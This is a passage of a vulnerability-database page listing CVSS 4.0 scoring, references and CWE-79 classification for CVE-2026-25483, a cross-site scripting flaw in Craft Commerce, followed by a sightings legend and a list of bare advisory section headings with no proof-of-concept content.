          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.2,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "LOW",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-03T19:16:25.717",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/craftcms/commerce/releases/tag/4.10.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/craftcms/commerce/releases/tag/5.5.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory",
        "Patch"
      ],
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25483 (GCVE-0-2026-25483)

GHSA-8478-RMJG-MJJ5

Summary

Proof of Concept

Required Permissions

Attacker Server Setup

Steps to Reproduce

XSS Payload (DB Exfiltration)

Technical Details (Vulnerable Code)

Impact

Mitigation

Resources:

FKIE_CVE-2026-25483

Tags

Sightings

Nomenclature